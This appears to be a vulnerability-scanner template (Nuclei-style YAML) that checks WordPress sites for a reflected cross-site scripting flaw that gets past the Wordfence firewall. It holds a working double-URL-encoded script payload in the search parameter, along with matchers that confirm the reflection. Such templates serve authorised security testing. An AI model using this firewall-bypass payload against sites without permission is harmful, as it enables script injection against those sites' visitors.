id: wordpress-wordfence-waf-bypass-xss

info:
  name: Wordpress Wordfence - Cross-Site Scripting
  author: hackergautam
  severity: medium
  description: Wordpress Wordfence is vulnerable to cross-site scripting.
  reference:
    - https://twitter.com/naglinagli/status/1382082473744564226
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,wordfence,xss,bypass

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - <script>alert(document.domain)</script>
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07
